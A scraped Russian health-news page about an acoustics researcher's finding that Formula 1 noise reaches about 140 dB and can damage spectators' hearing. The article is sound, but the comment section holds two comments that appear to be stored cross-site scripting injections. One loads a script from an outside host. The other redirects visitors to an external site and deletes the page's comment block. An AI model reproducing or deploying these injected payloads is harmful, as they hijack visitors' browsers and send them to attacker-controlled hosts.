Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гонки Формулы-1 оглушат в...  >>  Гонки Формулы-1 оглушат вас!
 
Обратная связь
 

Гонки Формулы-1 оглушат вас!

Размер шрифта
10 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Если вы любите гонки и не можете отказать себе в удовольствии вживую посмотреть Формулу-1, то у врачей для вас плохая новость. Как оказалось, уровень шума на гонках настолько высок, что их фанатам придется надевать беруши и звукозащитные наушники одновременно, чтобы наслаждаться этим зрелищным соревнованием и при этом не повредить свой слух. 

Гонки Формулы-1 оглушат вас!

«Высокий уровень шума на Формуле-1 может стать причиной нарушений слуха вплоть до его потери», – заявляет Крэйг Долдер, докторант акустической инженерии из Университета Техаса.

Не секрет, что очень многие современные развлечения являются довольно громкими. К примеру, зашкаливающей громкостью славятся концерты в жанре хэви-метал. А фанаты футбольного клуба Сиэтл Сихокс недавно так разбушевались во время игры, что их крики и топот засекли сейсмографы, предназначенные для регистрации землетрясений.

Крэйг Долдер является преданным фанатом автомобильных гонок Формулы-1. Но являясь также специалистом по акустической инженерии, он заинтересовался вопросом, оказывает ли шум машин во время гонок негативное влияние на слух. Интернет-форумы предлагают использовать во время гонок различные приспособления: некоторые рекомендуют беруши, некоторые – специальные звукозащитные наушники. Однако многие все еще придерживаются той точки зрения, что защита не нужна вовсе, а шум – неотъемлемая часть веселья на гонках.

Чтобы получить более точный ответ на свой вопрос, Долдер измерил уровень шума в нескольких местах на гоночном треке Формулы-1. Наиболее высокие значения он получил в одной из точек – уровень шума составил около 140 децибел. Известно, что звуки такой громкости могут стать причиной потери слуха. Люди, которые сидят в наиболее громких зонах получают за всю гонку «дозу шума» в 85 раз превышающую их дневную норму, если не используют специальные средства защиты.

«Я просто провел измерения в трех различных точках», – говорит Долдер. «Скорее всего, на трибунах есть гораздо более громкие и более тихие места, чем те, которые удалось обнаружить мне».

Чтобы найти способ безопасно наслаждаться гонками, Долдер проанализировал возможности шумоподавления некоторых популярных технических средств. Он выяснил, что некоторым зрителям Формулы-1 придется использовать одновременно и беруши, и специальные наушники, чтобы достичь безопасного для здоровья уровня шума. Закрытые наушники с шумоподавлением, которые созданы для защиты от постоянного шума, не смогут эффективно справиться с устранением острых и коротких шумов, производимых гоночными машинами, считает Долдер.

Однако, основываясь на своих измерениях, Долдер не может пока точно сказать, что Формула-1 хуже влияет на слух чем, к примеру, те же хэви-метал концерты. В продолжение своей работы он собирается изучить уровни шума на Американском аналоге Формулы-1, гонках NASCAR.

Так что если просмотр гонок по телевизору – не для вас, не забывайте пользоваться качественными средствами для защиты своего слуха, находясь на зрительской трибуне.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 марта 2015 в 21:12

Цитировать   |   Пожаловаться

Посетители гонок Формулы-1 подвергаются воздействию шума, превышающим более чем на 8000% дневную норму. К такому выводу пришел Крэйг Долдер из Университета Техаса, отмечает The Telegraf.

2 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Вся правда о соплях   Мужчины против женщин. Кто лучше?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как не оглохнуть на отдыхе
Все нормально, вы просто стареете
Странные сигналы вашего организма

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.